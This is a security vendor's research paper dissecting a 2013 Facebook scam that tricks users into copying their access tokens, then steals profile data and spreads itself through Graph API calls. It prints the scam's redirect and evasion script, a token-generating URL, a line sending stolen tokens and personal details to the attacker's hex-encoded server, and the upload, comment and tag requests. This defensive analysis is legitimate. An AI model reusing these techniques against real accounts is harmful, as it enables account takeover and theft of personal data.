Vulnerability analysis of the Facebook
authorization mechanism
A Cyberoam Research | www.cyberoam.com
Contents
Introduction
3
Impact
4
Vulnerability highlights
4
Attack Vector
4
Detail Technical Analysis
5
Click and redirections
5
Validation of the geographic position
6
Generate, reflect and collect access tokens for Facebook API access
7
Accumulating victim information
9
Uploading picture and comment
11
Tagging friends
12
Malicious servers
12
Possible defense mechanism against this scam & similar threats
13
Conclusion
14
A Cyberoam Research | www.cyberoam.com
2
Introduction
With the increasing popularity and number of users on Facebook, cyber criminals now know
where to hunt for their victims. As per the recent reports till March 2013 Facebook hosts 1.11
billion user profiles. Now that's a huge number, and cyber criminals very well realize this. Reports
state that scams targeting the social network have doubled. The fact that Facebook is now
becoming a huge platform for spammers/scammers/cyber criminals to reach out to more users,
easily, is no new news. A post getting viral plays a huge role in spreading them, taking scam
propagation to next levels.
In such scenarios, it is important to find out what happened, how an account got compromised
and more importantly to remove all traces of the spam links. This research paper is an attempt to
dissect a Facebook oriented scam namely ‘lady with razor-sharp axe’, which goes beyond the
traditional intentions of a scam on Facebook.
A Cyberoam Research | www.cyberoam.com
3
Impact
Victims find themselves involved with numerous Internet scams such as clickjacking attacks,
spammy reward offers or survey scams, without their knowledge and permissions. The threat gets
dangerous with identity fraud and/or scam attacks getting involved also. Apart from this the scam
also stores stolen Facebook access tokens onto command servers for further attacks or exploits,
clearly indicating that this attack is not limited to tagging or uploading of photos. Upon clicking the
link, Facebook users are unwittingly handing over complete access to their Facebook account,
which remains available to attackers even after an affected user logs out from Facebook account.
Vulnerability highlights
CTRL's investigation on Facebook's access token authorization mechanism brought into light
some key highlights which include:
§When someone connects with an app using Facebook login, the app is able to obtain access
token that provides temporary secure access to Facebook APIs. Normally, an app gains rights to
a Facebook user's access token only after the user authorizes that request.
§Facebook's access token authorization mechanism has a security vulnerability that allows cyber
attackers to bypass Facebook's Access Token Authorization mechanism. This entitles cyber
attackers to generate unauthorized yet valid access tokens.
§Such unauthorized yet valid Access Tokens have permissions to perform a range of activities
such as uploading photos and videos, posting comments, pay with Facebook, publish content,
and send SMS, read mailbox, tag friends' photos and more. With this, an attacker is able to
perform nearly every task which a Facebook user can do and hence can wield various malicious
actions.
§The ongoing Facebook spam - 'lady with razor-sharp axe' tends to store such stolen Facebook
Access Tokens on their servers for further attacks or exploits. This attack is not limited only to
tagging or uploading of photos. Facebook users are unwittingly handing over complete access
to their Facebook account, which remains available to attackers even after an affected user logs
out from Facebook account.
Attack Vector
The attack vector is definitely Facebook-a social networking platform, which is widely used by
billions of users and the attack can be categorized as a Web attack.
A Cyberoam Research | www.cyberoam.com
4
Detail Technical Analysis
The threat appears as a casual tagged photograph on FB asking users to click on a link in the
description. Once the user clicks on the link the following phases occur:
1) Click and redirections
2) Validation of the geographic position and human check
3) Generate and reflect access tokens for Facebook API access
4) Accumulating victim information
5) Uploading picture and comment
6) Tagging friends
Click and redirections
The tagged picture as shown in the image below had a description asking to check what
happened next by clicking on the link http://tinyurl.com/xxxxxxx/?cid=51b014466dd6
As soon as the user clicks the link, he/she will be redirected to http://niazamoo.xxx.xx.cm/?cid=51b0144660dd6
A closer look into this normal looking process, disclosed a number of hidden malicious activities
happening, in the backend.
A Cyberoam Research | www.cyberoam.com
5
The malicious activity started by accessing 'ringa.php'; hosted on the
domain 'xxxxxx.info'. On further investigation it was found that the
domain owner's information for 'xxxxxx.info' was protected (or
hidden) using 'WhoisGuard' services.
Validation of the geographic position
Next an access to http://xxxxx.info/ringa.php turned out as HTTP 302
redirection to http://nu-zamoo.eu01.xxx.xx.cm/?cid=51b0144660dd6
which has following HTML page,
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title></title>
<script language="JavaScript" src="http://j.maxmind.com/app/geoip.js"></script>
<script language="javascript">
var city= geoip_city();
var state= geoip_region();
var country= geoip_country_code();
if(city == "Torrance")
{
window.location = "http://youtube.com"
}
if(city == "Menlo Park")
{
window.location = "http://youtube.com"
}
if(city == "Palo Alto")
{
window.location = "http://youtube.com"
}
if(city == "Montara")
{
window.location = "http://youtube.com"
}
</script>
<script>
if(top != self && document.location.hash != '#lock'){
if("sandbox" in document.createElement("iframe")){
document.location =
"http://facebook.com/connect/connect.php?href=http://www.facebook.com/facebook&conn
ections=100";
}else{
top.location = self.location;
}
}
</script>
</head>
<body >
<script
src="http://0xXXXXXXX/~silali/watch/jack.php?action=connect&cid=51b0144660dd6"></s
cript>
</body>
</html>
A Cyberoam Research | www.cyberoam.com
6
http://j.maxmind.com/app/geoip.js was used to get city information. The strange fact is that if the
victim's city is one of the following then the user was redirected you to http://youtube.com
1) Torrance
2) Menlo Park
3) Palo Alto
4) Montara
Although the reason for such an action is unknown, it indicates that the cities are from Silicon
Valley and the attackers didn't desire to mess with them.
But in our case the city was Ahmedabad, India and hence we were redirected to http://0xXXXXXXX
1
/~silali/watch/jack.php which finally looks like below,
Generate, reflect and collect access tokens for Facebook API
access
An investigation of the backend activity happening during this process CTRL found the scam
generating and reflecting access token by accessing below backend URL to his malicious
webpage.
http://0x404f4ce2/~silali/watch/blank3.php?u=viewsource%3Ahttps__JCK_PROTO__www.facebook.com%2Flogin.php%3Fapi_key%3D139682082719810%26skip_api_login%3D1%26display%
3Dpopup%26cancel_url%3Dhttp%253A%252F%252Fm.facebook.com%25253Fsdk%25253Dios%2526error_reason%253Duser_denied%252
6error%253Daccess_denied%2526error_description%253DThe%252Buser%252Bdenied%252Byour%252Brequest.%26fbconnect%3D1%26
next%3Dhttps%3A%2F%2Fm.facebook.com%2F%252Fdialog%252Fpermissions.request%253F_path%253Dpermissions.request%2526app_i
d%253DXXXXXXXXXX%2526client_id%253DXXXXXXXXX%2526redirect_uri%253Dhttps%3A%2F%2Fwww.facebook.com%2Fconnect%2Flogin_s
uccess.html%3Fdisplay%253Dpopup%2526type%253Duser_agent%2526perms%253Doffline_access%2526fbconnect%253D1%2526from_lo
gin%253D1%2526rcount%253D1%26rcount%3D2&framed=1
1
NOTE: 0xXXXXXXX is nothing but HEX conversion of IP address 64.79.76.XXX. Yes, it is one of the evasion technique used against security
products uses only IP and FQDN for filtering.
A Cyberoam Research | www.cyberoam.com
7
What surprised us is the fact that we found an access token in the URL. In our hunt for an answer
for the same, we found the below definition from Facebook.
“When someone connects with an app using Facebook Login, the app will be able to obtain an
access token which provides temporary, secure access to Facebook APIs.2”
Once victim clicks on the play button (seen in the previous screen, shown above), it asked the
user to follow some steps- resembling a human check.
The above key combinations looked suspicious and on further investigation it was revealed that it
was used for nothing but copying the above generated access token from the location bar.
A closer look into the process indicated the fact that the user himself was copying and then
pasting the generated access token embedded in the URL to the command server for further
exploits/usages.
2
https://developers.facebook.com/docs/facebook-login/access-tokens/
A Cyberoam Research | www.cyberoam.com
8
As soon as the user enters CTRL+V, the second phase of the malicious activity begins by
accessing number of backend URLs explained below. During this duration the scam shows a
fancy progress bar to keep the victim waiting for few seconds.
Accumulating victim information
Having obtained access tokens, next the scam tries to accumulate information. Once the scam
got the access token, it now has temporary and secure access to Facebook APIs.
It was also found that Facebook's Graph API was been used to check what permissions are
available for access token using below backend URL,
https://graph.facebook.com/me/permissions?access_token=CAABZCCkTsCEIBAKZADaUVmyKMWvi1bXVbd8Ot4qhUDNB0HXXXXXXXXXXXXXX
XXXZASEPDJuZAuSGH3ufOZC21JH2c0XBVjmWdAF6yXt1ZC8t7uK3c61SQHYOOHHZAK8gKfNYL4ZA5ErECh3U3bRtK4HLpNpvYgZD&_=13714
52559417
A Cyberoam Research | www.cyberoam.com
9
As shown in the above image, the malicious process got all the necessary permissions to
propagate itself.
As per the definition by Facebook,
‘The Graph API is the primary way that data is retrieved or posted to Facebook. The Graph API
Getting Started Guide contains an overview of the basics of the API and walks you through using
the Graph API Explorer. It also shows you how names work, how permissions work and what
connections are.3'
Later, the scam fetched friends list using below backend URL,
https://graph.facebook.com/me/friends?limit=3000&access_token=CAABZCCkTsCEIBAKZADaUVmyKMWvi1bXVbd8Ot4qhUDNXXXXXXXXXXX
XXXOdZASEPDJuZAuSGH3ufOZC21JH2c0XBVjmWdAF6yXt1ZC8t7uK3c61SQHYOOHHZAK8gKfNYL4ZA5ErECh3U3bRtK4HLpNpvYgZD&_=13
71452559959
The response seen was evident of the same,
Yet another backend URL, fetches user's detail,
https://graph.facebook.com/me?access_token=CAABZCCkTsCEIBAKZADaUVmyKMWvi1bXVbd8Ot4qhUDNB0HDy2LE0ArjodIvXXXXXXXXXXXX
H3ufOZC21JH2c0XBVjmWdAF6yXt1ZC8t7uK3c61SQHYOOHHZAK8gKfNYL4ZA5ErECh3U3bRtK4HLpNpvYgZD&_=1371452560235
1
https://developers.facebook.com/docs/reference/api/
A Cyberoam Research | www.cyberoam.com
10
Here is the evidence for that,
Apart from these the scam was also found posting the hacked victim details to its command
centre for offline usage by an attacker;
http://0xXXXXXXXX/~silali/watch/jack.php?action=add_token&token=CAABZCCkTsCEIBAKZADaUVmyKMWvi1bXVbd8Ot4qhUDNB0HDy2LE0
ArjodIvVfiARWKOdZASEPDJuZAuSGH3ufOZC21JH2c0XBVjmWdAF6yXt1ZC8t7uK3c61SQHYOOHXXXXXXXXXXXXXXXXXX3bRtK4HLpNpvYgZD&a
pp_id=244767798982043&cid=51b0144660dd6&user[id]=10000XXX9668313&user[name]=Krish+Ra&user[first_name]=Krish&user[last_na
me]=Ra&user[link]=http__JCK_PROTO__www.facebook.com/kjrazz&user[username]=XXXXX&user[birthday]=12/01/1986&user[bio]=!!!!!!&
user[sports]=[object+Object]&user[inspirational_people]=[object+Object]&user[gender]=male&user[interested_in]=female&user[religion]
=Hinduism&user[email]=XXXXXX@yahoo.com&user[timezone]=5.5&user[locale]=en_US&user[updated_time]=2013-06-03T04:14:40+0000
This is the most alarming attribute of this scam, as even logging of account or removing the
application from the settings won't solve the issue. Also all the user data is securely being saved
onto a separate server
Uploading picture and comment
After accumulating enough detail, next the scam began with propagation by uploading a photo to
victim's Facebook without his information using below POST request using Graph API and access
token,
POST /me/photos HTTP/1.1
Host: graph.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://nu-zamoo.eu01.XXX.XX.cm/?cid=51b0144660dd6
Content-Length: 126243
Content-Type: multipart/form-data; boundary=---------------------------11171139036948
Origin: http://nu-zamoo.eu01.aws.af.cm
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
-----------------------------11171139036948
Content-Disposition: form-data; name="name"
[OMG] she went totally nuts and lost all control of the razor-sharp axe :O Well, Watch what
happened..in..this..video:_:: http://tinyurl.com/XXXXXXX/?cid=51b0144660dd6
-----------------------------11171139036948
Content-Disposition: form-data; name="source"; filename="blob"
Content-Type: image/jpeg
A Cyberoam Research | www.cyberoam.com
11
If you can see, the same tiny URL has been shared with uploaded picture for continue the
propagation.
Also, added comment to uploaded pic,
POST /4710XXX92983032/comments HTTP/1.1
Host: graph.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://nu-zamoo.eu01.XXX.XX.cm/?cid=51b0144660dd6
Content-Length: 468
Content-Type: multipart/form-data; boundary=---------------------------240743105527104
Origin: http://nu-zamoo.eu01.XXX.XX.cm
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
-----------------------------240743105527104
Content-Disposition: form-data; name="message"
She couldn't help it,
it was really unexpected :(
-----------------------------240743105527104
Content-Disposition: form-data; name="access_token"
CAABZCCkTsCEIBAKZADaUVmyKMWvi1bXVbd8Ot4qhUDNB0HDy2LE0ArjodIvVfiARWKOdZ
ASEPDJuZAuSGH3ufOZC21JH2c0XBVjmWdAF6yXt1ZC8tXXXXXXXXXXXXXXHHZAK8gKfNY
L4ZA5ErECh3U3bRtK4HLpNpvYgZD
-----------------------------240743105527104–
Tagging friends
In order to assure maximum propagation, the scam tags all friends collected from friends list to
the uploaded picture to ensure the obvious reflection the post on their wall or timeline.
POST /4710XXXX2983032/tags HTTP/1.1
Host: graph.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://nu-zamoo.eu01.XXX.XX.cm/?cid=51b0144660dd6
Content-Length: 744
Content-Type: multipart/form-data; boundary=---------------------------23944137515299
Origin: http://nu-zamoo.eu01.XXX.XX.cm
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
-----------------------------23944137515299
Content-Disposition: form-data; name="tags"
[{"tag_uid":"10000XXXX026196","x":98,"y":72},{"tag_uid":"608XXX701","x":82,"y":80},{"tag_uid
":"10000077XXX3009","x":46,"y":42},{"tag_uid":"100000XXX784757","x":71,"y":82},{"tag_uid":"1
00000XXX809649","x":22,"y":21},{"tag_uid":"100000XXXX17436","x":9,"y":32},{"tag_uid":"79XX
XX774","x":45,"y":87},{"tag_uid":"117XXX4623","x":98,"y":81}]
-----------------------------23944137515299
Content-Disposition: form-data; name="access_token"
CAABZCCkTsCEIBAKZADaUVmyKMWvi1bXVbd8Ot4qhUDNB0HDy2LE0ArjodIvVfiARWKOdZ
ASEPDJuZAuSGH3ufOZC21JH2c0XBVjmWdAF6yXt1XXXXXXXXXXXHYOOHHZAK8gKfNYL4
ZA5ErECh3U3bRtK4HLpNpvYgZD
-----------------------------23944137515299–
A Cyberoam Research | www.cyberoam.com
12
After completing all the above mentioned backend activities in a mere time span of 2-3 mins,
victim is shown a page like the one shown in the below figure indicating the completion of the
process.
And finally redirects to image content making victim believe that the process was genuine.
Malicious servers
The servers used for the threat include:
1) XXX.XX.cm --- Primary Content Server hosted on Amazon cloud
2) XXXXX.info --- Used for redirection
3) 64.79.76.XXX --- Reflecting server
Possible defense mechanism against this scam & similar
threats
1) As a Facebook user, do not get tempted to visit or click this video / link
2) Any Facebook user who has already visited this link should immediately change his / her
Facebook account password, for this would lead to expiry of old Access Tokens
3) Turn-off “Apps you use” from App Settings in Facebook account so that no app is able to gain
access token to Facebook account
Cyberoam Threat Protection against the ‘lady with razor-sharp axe’ Facebook Scam
As far as Cyberoam users are concerned with regard to the ‘lady with razor-sharp axe’scam, they
can stay safe by filtering LAN-to-WAN traffic using web filter keeping “Spyware” category as
denied. Cyberoam users can also detect/drop access to Facebook Graph API using application
filter.
A Cyberoam Research | www.cyberoam.com
13
Conclusion
These findings clearly indicate a security vulnerability that allows cyber attackers to bypass
Facebook's Access Token Authorization mechanism, which entitles cyber criminals to generate
unauthorized yet valid access tokens. Some of the note worthy facts of this attack like protecting
domain owner information, converting IP addresses into HEX conversation, avoiding attacks on
specific cities and so on, indicates the quantum of efforts attackers/criminals are taking to
ensuring their identity isn't revealed.
CTRL has already reported this vulnerability to Facebook and extensive investigation from CTRL
would be revealed upon suitable reciprocation or release of security patch from Facebook. In the
wake of such growing threat incidents, Cyberoam believes that users of Social Media need to be
provided with adequate awareness to promote safe social networking.
As far as Cyberoam users are concerned with regard to the ‘lady with razor-sharp axe’scam, they
can filter LAN-to-WAN traffic using web filter keeping “Spyware” category as deny. Cyberoam
users can also detect/drop access to Facebook Graph API using application filter.
Toll Free Numbers
USA : +1-800-686-2360 | India : 1-800-301-00013 | APAC/MEA : +1-877-777-0368 | Europe : +44-808-120-3958
www.cyberoam.com | sales@cyberoam.com
Copyright 1999 - 2013 Cyberoam Technologies Private Ltd. All rights reserved. Cyberoam, Cyberoam logo are
trademark of Cyberoam Technologies Pvt. Ltd.
Cyberoam assumes no responsibility for accuracy or completeness of information. Neither is this a legally binding
representation. Cyberoam has the right to change, modify, transfer or otherwise revise the publication without notice.